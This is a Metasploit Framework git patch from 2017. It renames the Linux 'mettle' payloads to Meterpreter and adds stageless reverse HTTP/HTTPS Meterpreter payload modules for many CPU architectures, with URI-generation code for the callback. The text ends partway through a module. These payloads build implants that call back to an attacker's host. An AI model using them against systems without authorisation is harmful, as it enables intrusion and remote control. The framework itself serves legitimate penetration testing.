From 353191992fc29057842adc0bbff92d808bd49556 Mon Sep 17 00:00:00 2001 From: Brent Cook Date: Tue, 21 Mar 2017 04:38:18 -0500 Subject: [PATCH 1/7] move mettle payloads to meterpreter, add reverse_http/s stageless --- ...ttle_linux.rb => meterpreter_x64_linux.rb} | 2 +- .../base/sessions/meterpreter_x86_linux.rb | 6 + .../sessions/meterpreter_x86_mettle_linux.rb | 29 --- lib/msf/base/sessions/mettle_config.rb | 77 ++++++- lib/rex/payloads/meterpreter/uri_checksum.rb | 2 +- .../linux/aarch64/meterpreter_reverse_http.rb | 42 ++++ .../aarch64/meterpreter_reverse_https.rb | 42 ++++ ...erse_tcp.rb => meterpreter_reverse_tcp.rb} | 11 +- .../linux/armbe/meterpreter_reverse_http.rb | 42 ++++ .../linux/armbe/meterpreter_reverse_https.rb | 42 ++++ ...erse_tcp.rb => meterpreter_reverse_tcp.rb} | 11 +- .../linux/armle/meterpreter_reverse_http.rb | 42 ++++ .../linux/armle/meterpreter_reverse_https.rb | 42 ++++ ...erse_tcp.rb => meterpreter_reverse_tcp.rb} | 11 +- .../linux/mips64/meterpreter_reverse_http.rb | 42 ++++ .../linux/mips64/meterpreter_reverse_https.rb | 42 ++++ ...erse_tcp.rb => meterpreter_reverse_tcp.rb} | 11 +- .../linux/mipsbe/meterpreter_reverse_http.rb | 42 ++++ .../linux/mipsbe/meterpreter_reverse_https.rb | 42 ++++ ...erse_tcp.rb => meterpreter_reverse_tcp.rb} | 11 +- .../linux/mipsle/meterpreter_reverse_http.rb | 42 ++++ .../linux/mipsle/meterpreter_reverse_https.rb | 42 ++++ ...erse_tcp.rb => meterpreter_reverse_tcp.rb} | 11 +- .../linux/ppc/meterpreter_reverse_http.rb | 42 ++++ .../linux/ppc/meterpreter_reverse_https.rb | 42 ++++ ...erse_tcp.rb => meterpreter_reverse_tcp.rb} | 11 +- .../linux/ppc64le/meterpreter_reverse_http.rb | 42 ++++ .../ppc64le/meterpreter_reverse_https.rb | 42 ++++ ...erse_tcp.rb => meterpreter_reverse_tcp.rb} | 11 +- .../linux/x64/meterpreter_reverse_http.rb | 42 ++++ .../linux/x64/meterpreter_reverse_https.rb | 42 ++++ ...erse_tcp.rb => meterpreter_reverse_tcp.rb} | 15 +- .../linux/x86/meterpreter_reverse_http.rb | 42 ++++ .../linux/x86/meterpreter_reverse_https.rb | 42 ++++ ...erse_tcp.rb => meterpreter_reverse_tcp.rb} | 15 +- .../linux/zarch/meterpreter_reverse_http.rb | 42 ++++ .../linux/zarch/meterpreter_reverse_https.rb | 42 ++++ ...erse_tcp.rb => meterpreter_reverse_tcp.rb} | 11 +- .../linux/armle/{mettle.rb => meterpreter.rb} | 0 .../mipsbe/{mettle.rb => meterpreter.rb} | 0 .../mipsle/{mettle.rb => meterpreter.rb} | 0 .../linux/x64/{mettle.rb => meterpreter.rb} | 4 +- .../payloads/stages/linux/x86/meterpreter.rb | 214 ++++++------------ modules/payloads/stages/linux/x86/mettle.rb | 98 -------- tools/modules/generate_mettle_payloads.rb | 45 ++++ tools/modules/linux_meterpreter_reverse.erb | 40 ++++ 46 files changed, 1222 insertions(+), 348 deletions(-) rename lib/msf/base/sessions/{meterpreter_x64_mettle_linux.rb => meterpreter_x64_linux.rb} (85%) delete mode 100644 lib/msf/base/sessions/meterpreter_x86_mettle_linux.rb create mode 100644 modules/payloads/singles/linux/aarch64/meterpreter_reverse_http.rb create mode 100644 modules/payloads/singles/linux/aarch64/meterpreter_reverse_https.rb rename modules/payloads/singles/linux/aarch64/{mettle_reverse_tcp.rb => meterpreter_reverse_tcp.rb} (74%) create mode 100644 modules/payloads/singles/linux/armbe/meterpreter_reverse_http.rb create mode 100644 modules/payloads/singles/linux/armbe/meterpreter_reverse_https.rb rename modules/payloads/singles/linux/armbe/{mettle_reverse_tcp.rb => meterpreter_reverse_tcp.rb} (74%) create mode 100644 modules/payloads/singles/linux/armle/meterpreter_reverse_http.rb create mode 100644 modules/payloads/singles/linux/armle/meterpreter_reverse_https.rb rename modules/payloads/singles/linux/armle/{mettle_reverse_tcp.rb => meterpreter_reverse_tcp.rb} (74%) create mode 100644 modules/payloads/singles/linux/mips64/meterpreter_reverse_http.rb create mode 100644 modules/payloads/singles/linux/mips64/meterpreter_reverse_https.rb rename modules/payloads/singles/linux/mips64/{mettle_reverse_tcp.rb => meterpreter_reverse_tcp.rb} (74%) create mode 100644 modules/payloads/singles/linux/mipsbe/meterpreter_reverse_http.rb create mode 100644 modules/payloads/singles/linux/mipsbe/meterpreter_reverse_https.rb rename modules/payloads/singles/linux/mipsbe/{mettle_reverse_tcp.rb => meterpreter_reverse_tcp.rb} (74%) create mode 100644 modules/payloads/singles/linux/mipsle/meterpreter_reverse_http.rb create mode 100644 modules/payloads/singles/linux/mipsle/meterpreter_reverse_https.rb rename modules/payloads/singles/linux/mipsle/{mettle_reverse_tcp.rb => meterpreter_reverse_tcp.rb} (74%) create mode 100644 modules/payloads/singles/linux/ppc/meterpreter_reverse_http.rb create mode 100644 modules/payloads/singles/linux/ppc/meterpreter_reverse_https.rb rename modules/payloads/singles/linux/ppc/{mettle_reverse_tcp.rb => meterpreter_reverse_tcp.rb} (74%) create mode 100644 modules/payloads/singles/linux/ppc64le/meterpreter_reverse_http.rb create mode 100644 modules/payloads/singles/linux/ppc64le/meterpreter_reverse_https.rb rename modules/payloads/singles/linux/ppc64le/{mettle_reverse_tcp.rb => meterpreter_reverse_tcp.rb} (74%) create mode 100644 modules/payloads/singles/linux/x64/meterpreter_reverse_http.rb create mode 100644 modules/payloads/singles/linux/x64/meterpreter_reverse_https.rb rename modules/payloads/singles/linux/x64/{mettle_reverse_tcp.rb => meterpreter_reverse_tcp.rb} (65%) create mode 100644 modules/payloads/singles/linux/x86/meterpreter_reverse_http.rb create mode 100644 modules/payloads/singles/linux/x86/meterpreter_reverse_https.rb rename modules/payloads/singles/linux/x86/{mettle_reverse_tcp.rb => meterpreter_reverse_tcp.rb} (65%) create mode 100644 modules/payloads/singles/linux/zarch/meterpreter_reverse_http.rb create mode 100644 modules/payloads/singles/linux/zarch/meterpreter_reverse_https.rb rename modules/payloads/singles/linux/zarch/{mettle_reverse_tcp.rb => meterpreter_reverse_tcp.rb} (74%) rename modules/payloads/stages/linux/armle/{mettle.rb => meterpreter.rb} (100%) rename modules/payloads/stages/linux/mipsbe/{mettle.rb => meterpreter.rb} (100%) rename modules/payloads/stages/linux/mipsle/{mettle.rb => meterpreter.rb} (100%) rename modules/payloads/stages/linux/x64/{mettle.rb => meterpreter.rb} (95%) delete mode 100644 modules/payloads/stages/linux/x86/mettle.rb create mode 100755 tools/modules/generate_mettle_payloads.rb create mode 100644 tools/modules/linux_meterpreter_reverse.erb diff --git a/lib/msf/base/sessions/meterpreter_x64_mettle_linux.rb b/lib/msf/base/sessions/meterpreter_x64_linux.rb similarity index 85% rename from lib/msf/base/sessions/meterpreter_x64_mettle_linux.rb rename to lib/msf/base/sessions/meterpreter_x64_linux.rb index 2a81312faa..98e61cdfbd 100644 --- a/lib/msf/base/sessions/meterpreter_x64_mettle_linux.rb +++ b/lib/msf/base/sessions/meterpreter_x64_linux.rb @@ -10,7 +10,7 @@ module Sessions # This class creates a platform-specific meterpreter session type # ### -class Meterpreter_x64_Mettle_Linux < Msf::Sessions::Meterpreter +class Meterpreter_x64_Linux < Msf::Sessions::Meterpreter def supports_ssl? false end diff --git a/lib/msf/base/sessions/meterpreter_x86_linux.rb b/lib/msf/base/sessions/meterpreter_x86_linux.rb index 3d42c27618..ca83001525 100644 --- a/lib/msf/base/sessions/meterpreter_x86_linux.rb +++ b/lib/msf/base/sessions/meterpreter_x86_linux.rb @@ -11,6 +11,12 @@ module Sessions # ### class Meterpreter_x86_Linux < Msf::Sessions::Meterpreter + def supports_ssl? + false + end + def supports_zlib? + false + end def initialize(rstream, opts={}) super self.base_platform = 'linux' diff --git a/lib/msf/base/sessions/meterpreter_x86_mettle_linux.rb b/lib/msf/base/sessions/meterpreter_x86_mettle_linux.rb deleted file mode 100644 index 80c4a1b853..0000000000 --- a/lib/msf/base/sessions/meterpreter_x86_mettle_linux.rb +++ /dev/null @@ -1,29 +0,0 @@ -# -*- coding: binary -*- - -require 'msf/base/sessions/meterpreter' - -module Msf -module Sessions - -### -# -# This class creates a platform-specific meterpreter session type -# -### -class Meterpreter_x86_Mettle_Linux < Msf::Sessions::Meterpreter - def supports_ssl? - false - end - def supports_zlib? - false - end - def initialize(rstream, opts={}) - super - self.base_platform = 'linux' - self.base_arch = ARCH_X86 - end -end - -end -end - diff --git a/lib/msf/base/sessions/mettle_config.rb b/lib/msf/base/sessions/mettle_config.rb index d5a9678dc9..c57c13b8b2 100644 --- a/lib/msf/base/sessions/mettle_config.rb +++ b/lib/msf/base/sessions/mettle_config.rb @@ -1,22 +1,75 @@ # -*- coding: binary -*- require 'msf/core/payload/transport_config' +require 'msf/core/payload/uuid/options' require 'base64' module Msf -module Sessions -module MettleConfig + module Sessions + module MettleConfig - include Msf::Payload::TransportConfig + include Msf::Payload::TransportConfig - def generate_config(opts={}) - transport = transport_config_reverse_tcp(opts) - opts[:uuid] ||= generate_payload_uuid - opts[:uuid] = Base64.encode64(opts[:uuid].to_raw).strip - opts[:uri] ||= "#{transport[:scheme]}://#{transport[:lhost]}:#{transport[:lport]}" - opts.slice(:uuid, :uri, :debug, :log_file) + def generate_uri(opts={}) + ds = opts[:datastore] || datastore + uri_req_len = ds['StagerURILength'].to_i + + # Choose a random URI length between 30 and 128 bytes + if uri_req_len == 0 + uri_req_len = 30 + luri.length + rand(127 - (30 + luri.length)) + end + + if uri_req_len < 5 + raise ArgumentError, "Minimum StagerURILength is 5" + end + + generate_uri_uuid_mode(:init_connect, uri_req_len, uuid: opts[:uuid]) + end + + def generate_http_uri(opts) + if Rex::Socket.is_ipv6?(opts[:lhost]) + target_uri = "#{opts[:scheme]}://[#{opts[:lhost]}]" + else + target_uri = "#{opts[:scheme]}://#{opts[:lhost]}" + end + + target_uri << ':' + target_uri << opts[:lport].to_s + target_uri << luri + target_uri << generate_uri(opts) + target_uri + end + + def generate_tcp_uri(opts) + if Rex::Socket.is_ipv6?(opts[:lhost]) + target_uri = "#{opts[:scheme]}://[#{opts[:lhost]}]" + else + target_uri = "#{opts[:scheme]}://#{opts[:lhost]}" + end + target_uri << ':' + target_uri << opts[:lport].to_s + target_uri + end + + def generate_config(opts={}) + opts[:uuid] ||= generate_payload_uuid + case opts[:scheme] + when 'http' + transport = transport_config_reverse_http(opts) + opts[:uri] = generate_http_uri(transport) + when 'https' + transport = transport_config_reverse_https(opts) + opts[:uri] = generate_http_uri(transport) + when 'tcp' + transport = transport_config_reverse_tcp(opts) + opts[:uri] = generate_tcp_uri(transport) + else + raise ArgumentError, "Unknown scheme: #{opts[:scheme]}" + end + opts[:uuid] = Base64.encode64(opts[:uuid].to_raw).strip + opts.slice(:uuid, :uri, :debug, :log_file) + end + + end end - -end -end end diff --git a/lib/rex/payloads/meterpreter/uri_checksum.rb b/lib/rex/payloads/meterpreter/uri_checksum.rb index ac42c0c0f8..ef005cd23d 100644 --- a/lib/rex/payloads/meterpreter/uri_checksum.rb +++ b/lib/rex/payloads/meterpreter/uri_checksum.rb @@ -66,7 +66,7 @@ module Rex # @param len [Integer] An optional URI length value, including the leading slash # @return [String] The URI string for connections def generate_uri_uuid(sum, uuid, len=nil) - curl_uri_len = URI_CHECKSUM_UUID_MIN_LEN+rand(URI_CHECKSUM_CONN_MAX_LEN-URI_CHECKSUM_UUID_MIN_LEN) + curl_uri_len = URI_CHECKSUM_UUID_MIN_LEN + rand(URI_CHECKSUM_CONN_MAX_LEN - URI_CHECKSUM_UUID_MIN_LEN) curl_prefix = uuid.to_uri if len diff --git a/modules/payloads/singles/linux/aarch64/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/aarch64/meterpreter_reverse_http.rb new file mode 100644 index 0000000000..de51b8ac8f --- /dev/null +++ b/modules/payloads/singles/linux/aarch64/meterpreter_reverse_http.rb @@ -0,0 +1,42 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core/handler/reverse_http' +require 'msf/base/sessions/meterpreter_options' +require 'msf/base/sessions/mettle_config' +require 'msf/base/sessions/meterpreter_aarch64_linux' + +module MetasploitModule + + CachedSize = 646808 + + include Msf::Payload::Single + include Msf::Sessions::MeterpreterOptions + include Msf::Sessions::MettleConfig + + def initialize(info = {}) + super( + update_info( + info, + 'Name' => 'Linux Meterpreter, Reverse HTTP Inline', + 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)', + 'Author' => [ + 'Adam Cammack ', + 'Brent Cook ' + ], + 'Platform' => 'linux', + 'Arch' => ARCH_AARCH64, + 'License' => MSF_LICENSE, + 'Handler' => Msf::Handler::ReverseHttp, + 'Session' => Msf::Sessions::Meterpreter_aarch64_Linux + ) + ) + end + + def generate + opts = {scheme: 'http'} + MetasploitPayloads::Mettle.new('aarch64-linux-musl', generate_config(opts)).to_binary :exec + end +end diff --git a/modules/payloads/singles/linux/aarch64/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/aarch64/meterpreter_reverse_https.rb new file mode 100644 index 0000000000..eed97cb69c --- /dev/null +++ b/modules/payloads/singles/linux/aarch64/meterpreter_reverse_https.rb @@ -0,0 +1,42 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core/handler/reverse_https' +require 'msf/base/sessions/meterpreter_options' +require 'msf/base/sessions/mettle_config' +require 'msf/base/sessions/meterpreter_aarch64_linux' + +module MetasploitModule + + CachedSize = 646808 + + include Msf::Payload::Single + include Msf::Sessions::MeterpreterOptions + include Msf::Sessions::MettleConfig + + def initialize(info = {}) + super( + update_info( + info, + 'Name' => 'Linux Meterpreter, Reverse HTTPS Inline', + 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)', + 'Author' => [ + 'Adam Cammack ', + 'Brent Cook ' + ], + 'Platform' => 'linux', + 'Arch' => ARCH_AARCH64, + 'License' => MSF_LICENSE, + 'Handler' => Msf::Handler::ReverseHttps, + 'Session' => Msf::Sessions::Meterpreter_aarch64_Linux + ) + ) + end + + def generate + opts = {scheme: 'https'} + MetasploitPayloads::Mettle.new('aarch64-linux-musl', generate_config(opts)).to_binary :exec + end +end diff --git a/modules/payloads/singles/linux/aarch64/mettle_reverse_tcp.rb b/modules/payloads/singles/linux/aarch64/meterpreter_reverse_tcp.rb similarity index 74% rename from modules/payloads/singles/linux/aarch64/mettle_reverse_tcp.rb rename to modules/payloads/singles/linux/aarch64/meterpreter_reverse_tcp.rb index 8ce52ca5eb..8ca59fe4d0 100644 --- a/modules/payloads/singles/linux/aarch64/mettle_reverse_tcp.rb +++ b/modules/payloads/singles/linux/aarch64/meterpreter_reverse_tcp.rb @@ -3,7 +3,6 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -require 'msf/core' require 'msf/core/handler/reverse_tcp' require 'msf/base/sessions/meterpreter_options' require 'msf/base/sessions/mettle_config' @@ -21,10 +20,11 @@ module MetasploitModule super( update_info( info, - 'Name' => 'Linux Meterpreter', - 'Description' => 'Run the mettle server payload (stageless)', + 'Name' => 'Linux Meterpreter, Reverse TCP Inline', + 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)', 'Author' => [ - 'Adam Cammack ' + 'Adam Cammack ', + 'Brent Cook ' ], 'Platform' => 'linux', 'Arch' => ARCH_AARCH64, @@ -36,6 +36,7 @@ module MetasploitModule end def generate - MetasploitPayloads::Mettle.new('aarch64-linux-musl', generate_config).to_binary :exec + opts = {scheme: 'tcp'} + MetasploitPayloads::Mettle.new('aarch64-linux-musl', generate_config(opts)).to_binary :exec end end diff --git a/modules/payloads/singles/linux/armbe/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/armbe/meterpreter_reverse_http.rb new file mode 100644 index 0000000000..c1e17751ff --- /dev/null +++ b/modules/payloads/singles/linux/armbe/meterpreter_reverse_http.rb @@ -0,0 +1,42 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core/handler/reverse_http' +require 'msf/base/sessions/meterpreter_options' +require 'msf/base/sessions/mettle_config' +require 'msf/base/sessions/meterpreter_armbe_linux' + +module MetasploitModule + + CachedSize = 639520 + + include Msf::Payload::Single + include Msf::Sessions::MeterpreterOptions + include Msf::Sessions::MettleConfig + + def initialize(info = {}) + super( + update_info( + info, + 'Name' => 'Linux Meterpreter, Reverse HTTP Inline', + 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)', + 'Author' => [ + 'Adam Cammack ', + 'Brent Cook ' + ], + 'Platform' => 'linux', + 'Arch' => ARCH_ARMBE, + 'License' => MSF_LICENSE, + 'Handler' => Msf::Handler::ReverseHttp, + 'Session' => Msf::Sessions::Meterpreter_armbe_Linux + ) + ) + end + + def generate + opts = {scheme: 'http'} + MetasploitPayloads::Mettle.new('armv5b-linux-musleabi', generate_config(opts)).to_binary :exec + end +end diff --git a/modules/payloads/singles/linux/armbe/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/armbe/meterpreter_reverse_https.rb new file mode 100644 index 0000000000..fc35312f1a --- /dev/null +++ b/modules/payloads/singles/linux/armbe/meterpreter_reverse_https.rb @@ -0,0 +1,42 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core/handler/reverse_https' +require 'msf/base/sessions/meterpreter_options' +require 'msf/base/sessions/mettle_config' +require 'msf/base/sessions/meterpreter_armbe_linux' + +module MetasploitModule + + CachedSize = 639520 + + include Msf::Payload::Single + include Msf::Sessions::MeterpreterOptions + include Msf::Sessions::MettleConfig + + def initialize(info = {}) + super( + update_info( + info, + 'Name' => 'Linux Meterpreter, Reverse HTTPS Inline', + 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)', + 'Author' => [ + 'Adam Cammack ', + 'Brent Cook ' + ], + 'Platform' => 'linux', + 'Arch' => ARCH_ARMBE, + 'License' => MSF_LICENSE, + 'Handler' => Msf::Handler::ReverseHttps, + 'Session' => Msf::Sessions::Meterpreter_armbe_Linux + ) + ) + end + + def generate + opts = {scheme: 'https'} + MetasploitPayloads::Mettle.new('armv5b-linux-musleabi', generate_config(opts)).to_binary :exec + end +end diff --git a/modules/payloads/singles/linux/armbe/mettle_reverse_tcp.rb b/modules/payloads/singles/linux/armbe/meterpreter_reverse_tcp.rb similarity index 74% rename from modules/payloads/singles/linux/armbe/mettle_reverse_tcp.rb rename to modules/payloads/singles/linux/armbe/meterpreter_reverse_tcp.rb index e399f321e4..5ee0c63881 100644 --- a/modules/payloads/singles/linux/armbe/mettle_reverse_tcp.rb +++ b/modules/payloads/singles/linux/armbe/meterpreter_reverse_tcp.rb @@ -3,7 +3,6 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -require 'msf/core' require 'msf/core/handler/reverse_tcp' require 'msf/base/sessions/meterpreter_options' require 'msf/base/sessions/mettle_config' @@ -21,10 +20,11 @@ module MetasploitModule super( update_info( info, - 'Name' => 'Linux Meterpreter', - 'Description' => 'Run the mettle server payload (stageless)', + 'Name' => 'Linux Meterpreter, Reverse TCP Inline', + 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)', 'Author' => [ - 'Adam Cammack ' + 'Adam Cammack ', + 'Brent Cook ' ], 'Platform' => 'linux', 'Arch' => ARCH_ARMBE, @@ -36,6 +36,7 @@ module MetasploitModule end def generate - MetasploitPayloads::Mettle.new('armv5b-linux-musleabi', generate_config).to_binary :exec + opts = {scheme: 'tcp'} + MetasploitPayloads::Mettle.new('armv5b-linux-musleabi', generate_config(opts)).to_binary :exec end end diff --git a/modules/payloads/singles/linux/armle/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/armle/meterpreter_reverse_http.rb new file mode 100644 index 0000000000..676228da47 --- /dev/null +++ b/modules/payloads/singles/linux/armle/meterpreter_reverse_http.rb @@ -0,0 +1,42 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core/handler/reverse_http' +require 'msf/base/sessions/meterpreter_options' +require 'msf/base/sessions/mettle_config' +require 'msf/base/sessions/meterpreter_armle_linux' + +module MetasploitModule + + CachedSize = 638320 + + include Msf::Payload::Single + include Msf::Sessions::MeterpreterOptions + include Msf::Sessions::MettleConfig + + def initialize(info = {}) + super( + update_info( + info, + 'Name' => 'Linux Meterpreter, Reverse HTTP Inline', + 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)', + 'Author' => [ + 'Adam Cammack ', + 'Brent Cook ' + ], + 'Platform' => 'linux', + 'Arch' => ARCH_ARMLE, + 'License' => MSF_LICENSE, + 'Handler' => Msf::Handler::ReverseHttp, + 'Session' => Msf::Sessions::Meterpreter_armle_Linux + ) + ) + end + + def generate + opts = {scheme: 'http'} + MetasploitPayloads::Mettle.new('armv5l-linux-musleabi', generate_config(opts)).to_binary :exec + end +end diff --git a/modules/payloads/singles/linux/armle/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/armle/meterpreter_reverse_https.rb new file mode 100644 index 0000000000..45e065ce68 --- /dev/null +++ b/modules/payloads/singles/linux/armle/meterpreter_reverse_https.rb @@ -0,0 +1,42 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core/handler/reverse_https' +require 'msf/base/sessions/meterpreter_options' +require 'msf/base/sessions/mettle_config' +require 'msf/base/sessions/meterpreter_armle_linux' + +module MetasploitModule + + CachedSize = 638320 + + include Msf::Payload::Single + include Msf::Sessions::MeterpreterOptions + include Msf::Sessions::MettleConfig + + def initialize(info = {}) + super( + update_info( + info, + 'Name' => 'Linux Meterpreter, Reverse HTTPS Inline', + 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)', + 'Author' => [ + 'Adam Cammack ', + 'Brent Cook ' + ], + 'Platform' => 'linux', + 'Arch' => ARCH_ARMLE, + 'License' => MSF_LICENSE, + 'Handler' => Msf::Handler::ReverseHttps, + 'Session' => Msf::Sessions::Meterpreter_armle_Linux + ) + ) + end + + def generate + opts = {scheme: 'https'} + MetasploitPayloads::Mettle.new('armv5l-linux-musleabi', generate_config(opts)).to_binary :exec + end +end diff --git a/modules/payloads/singles/linux/armle/mettle_reverse_tcp.rb b/modules/payloads/singles/linux/armle/meterpreter_reverse_tcp.rb similarity index 74% rename from modules/payloads/singles/linux/armle/mettle_reverse_tcp.rb rename to modules/payloads/singles/linux/armle/meterpreter_reverse_tcp.rb index 414d9d3b4a..bbc1472a37 100644 --- a/modules/payloads/singles/linux/armle/mettle_reverse_tcp.rb +++ b/modules/payloads/singles/linux/armle/meterpreter_reverse_tcp.rb @@ -3,7 +3,6 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -require 'msf/core' require 'msf/core/handler/reverse_tcp' require 'msf/base/sessions/meterpreter_options' require 'msf/base/sessions/mettle_config' @@ -21,10 +20,11 @@ module MetasploitModule super( update_info( info, - 'Name' => 'Linux Meterpreter', - 'Description' => 'Run the mettle server payload (stageless)', + 'Name' => 'Linux Meterpreter, Reverse TCP Inline', + 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)', 'Author' => [ - 'Adam Cammack ' + 'Adam Cammack ', + 'Brent Cook ' ], 'Platform' => 'linux', 'Arch' => ARCH_ARMLE, @@ -36,6 +36,7 @@ module MetasploitModule end def generate - MetasploitPayloads::Mettle.new('armv5l-linux-musleabi', generate_config).to_binary :exec + opts = {scheme: 'tcp'} + MetasploitPayloads::Mettle.new('armv5l-linux-musleabi', generate_config(opts)).to_binary :exec end end diff --git a/modules/payloads/singles/linux/mips64/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/mips64/meterpreter_reverse_http.rb new file mode 100644 index 0000000000..1fb23e0ba5 --- /dev/null +++ b/modules/payloads/singles/linux/mips64/meterpreter_reverse_http.rb @@ -0,0 +1,42 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core/handler/reverse_http' +require 'msf/base/sessions/meterpreter_options' +require 'msf/base/sessions/mettle_config' +require 'msf/base/sessions/meterpreter_mips64_linux' + +module MetasploitModule + + CachedSize = 1019344 + + include Msf::Payload::Single + include Msf::Sessions::MeterpreterOptions + include Msf::Sessions::MettleConfig + + def initialize(info = {}) + super( + update_info( + info, + 'Name' => 'Linux Meterpreter, Reverse HTTP Inline', + 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)', + 'Author' => [ + 'Adam Cammack ', + 'Brent Cook ' + ], + 'Platform' => 'linux', + 'Arch' => ARCH_MIPS64, + 'License' => MSF_LICENSE, + 'Handler' => Msf::Handler::ReverseHttp, + 'Session' => Msf::Sessions::Meterpreter_mips64_Linux + ) + ) + end + + def generate + opts = {scheme: 'http'} + MetasploitPayloads::Mettle.new('mips64-linux-muslsf', generate_config(opts)).to_binary :exec + end +end diff --git a/modules/payloads/singles/linux/mips64/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/mips64/meterpreter_reverse_https.rb new file mode 100644 index 0000000000..cca7335f5f --- /dev/null +++ b/modules/payloads/singles/linux/mips64/meterpreter_reverse_https.rb @@ -0,0 +1,42 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core/handler/reverse_https' +require 'msf/base/sessions/meterpreter_options' +require 'msf/base/sessions/mettle_config' +require 'msf/base/sessions/meterpreter_mips64_linux' + +module MetasploitModule + + CachedSize = 1019344 + + include Msf::Payload::Single + include Msf::Sessions::MeterpreterOptions + include Msf::Sessions::MettleConfig + + def initialize(info = {}) + super( + update_info( + info, + 'Name' => 'Linux Meterpreter, Reverse HTTPS Inline', + 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)', + 'Author' => [ + 'Adam Cammack ', + 'Brent Cook ' + ], + 'Platform' => 'linux', + 'Arch' => ARCH_MIPS64, + 'License' => MSF_LICENSE, + 'Handler' => Msf::Handler::ReverseHttps, + 'Session' => Msf::Sessions::Meterpreter_mips64_Linux + ) + ) + end + + def generate + opts = {scheme: 'https'} + MetasploitPayloads::Mettle.new('mips64-linux-muslsf', generate_config(opts)).to_binary :exec + end +end diff --git a/modules/payloads/singles/linux/mips64/mettle_reverse_tcp.rb b/modules/payloads/singles/linux/mips64/meterpreter_reverse_tcp.rb similarity index 74% rename from modules/payloads/singles/linux/mips64/mettle_reverse_tcp.rb rename to modules/payloads/singles/linux/mips64/meterpreter_reverse_tcp.rb index 9b14d5b953..a4e2037ae9 100644 --- a/modules/payloads/singles/linux/mips64/mettle_reverse_tcp.rb +++ b/modules/payloads/singles/linux/mips64/meterpreter_reverse_tcp.rb @@ -3,7 +3,6 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -require 'msf/core' require 'msf/core/handler/reverse_tcp' require 'msf/base/sessions/meterpreter_options' require 'msf/base/sessions/mettle_config' @@ -21,10 +20,11 @@ module MetasploitModule super( update_info( info, - 'Name' => 'Linux Meterpreter', - 'Description' => 'Run the mettle server payload (stageless)', + 'Name' => 'Linux Meterpreter, Reverse TCP Inline', + 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)', 'Author' => [ - 'Adam Cammack ' + 'Adam Cammack ', + 'Brent Cook ' ], 'Platform' => 'linux', 'Arch' => ARCH_MIPS64, @@ -36,6 +36,7 @@ module MetasploitModule end def generate - MetasploitPayloads::Mettle.new('mips64-linux-muslsf', generate_config).to_binary :exec + opts = {scheme: 'tcp'} + MetasploitPayloads::Mettle.new('mips64-linux-muslsf', generate_config(opts)).to_binary :exec end end diff --git a/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_http.rb new file mode 100644 index 0000000000..da77150e78 --- /dev/null +++ b/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_http.rb @@ -0,0 +1,42 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core/handler/reverse_http' +require 'msf/base/sessions/meterpreter_options' +require 'msf/base/sessions/mettle_config' +require 'msf/base/sessions/meterpreter_mipsbe_linux' + +module MetasploitModule + + CachedSize = 997900 + + include Msf::Payload::Single + include Msf::Sessions::MeterpreterOptions + include Msf::Sessions::MettleConfig + + def initialize(info = {}) + super( + update_info( + info, + 'Name' => 'Linux Meterpreter, Reverse HTTP Inline', + 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)', + 'Author' => [ + 'Adam Cammack ', + 'Brent Cook ' + ], + 'Platform' => 'linux', + 'Arch' => ARCH_MIPSBE, + 'License' => MSF_LICENSE, + 'Handler' => Msf::Handler::ReverseHttp, + 'Session' => Msf::Sessions::Meterpreter_mipsbe_Linux + ) + ) + end + + def generate + opts = {scheme: 'http'} + MetasploitPayloads::Mettle.new('mips-linux-muslsf', generate_config(opts)).to_binary :exec + end +end diff --git a/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_https.rb new file mode 100644 index 0000000000..186eec725c --- /dev/null +++ b/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_https.rb @@ -0,0 +1,42 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core/handler/reverse_https' +require 'msf/base/sessions/meterpreter_options' +require 'msf/base/sessions/mettle_config' +require 'msf/base/sessions/meterpreter_mipsbe_linux' + +module MetasploitModule + + CachedSize = 997900 + + include Msf::Payload::Single + include 